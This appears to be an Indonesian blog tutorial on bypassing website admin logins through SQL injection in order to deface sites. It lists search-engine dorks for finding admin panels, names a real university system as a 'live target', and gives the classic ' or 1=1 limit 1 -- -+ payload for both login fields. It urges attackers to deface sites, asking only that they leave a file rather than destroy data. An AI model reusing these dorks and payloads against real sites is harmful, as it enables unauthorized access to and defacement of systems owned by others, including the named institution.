Mungkin dari kalian atau mungkin banyak diluar sana yang kurang mengerti dan bertanya tanya apa itu bypass sql login ? Menurut beberapa sumber yang saya baca,bypass sql login (Bypass Sql Injection) adalah suatu teknik deface yang memanfaatkan miss configuration pada Database SQL yang berimbas pada kesalahan identifikasi query. Hal ini bisa dimanfaatkan oleh para attacker untuk menerobos login admin tanpa proses filter dari config database website tersebut,dan hasilnya sang attacker dengan mudah mendapatkan akses web korban. Teknik ini hampir sama dengan teknik bypass admin,tetapi dalam Bypass Sql Injection ini lebih bisa dipertimbangkan. Biasanya kalau bypass admin tidak bisa,maka saya akan mencoba menggunakan cara deface yang ini.
Bagaimana Cara Bypass Sql Injection ?
Tak perlu basa basi lagi,kita langsung saja ke metode defacenya,checkidot :
Yang pertama yang dibutuhkan adalah dork,kalian bisa menggunakan berbagai macam search engine seperti google,bing,yahoo, dan berbagai macam search enginge lainnya.
#Dork :
- inurl:manager intitle:Admin Panel
- inurl:/admin2/ ext:php
- inurl:/admin/ ext:php
- inurl:/adminpanel/ext:php
- inurl:/admin_panel/
- dan lainnya (use ur brain)
Live Target : http://simakpro.widyamataram.ac.id/simakpro.php?module=home
2. Jika sudah memilih target yang vuln silahkan anda coba login dengan user pass ini :
user : ‘ or 1=1 limit 1 — -+
pass : ‘ or 1=1 limit 1 — -+
Nah jika website yang kita target ternyata vuln,maka dengan username dan password tersebut kita akan langsung masuk ke dashboard admin/user,dan kita bisa melakukan berbagai macam hal layaknya seorang admin pada umumnya.
Bagaimana ? Cara bypass sql login ini termasuk mudah digunakan bagi para attacker untuk masuk dan menerobos system suatu website. Tapi sebaliknya,bagi para developer atau admin website ini adalah cara yang sangat berbahaya dan sangat critical.
Jadi pesan saya untuk para attacker,jika kalian mau deface menggunakan teknik ini,TOLONG JANGAN DIRUSAK WEBSITE KORBAN (CUKUP TITIP FILE AJA),setidaknya kalau mau iseng,kalian WAJIB BACKUP WEBSITE tersebut terlebih dahulu,ingat prinsip Etchical Hacker Indonesia
No comments: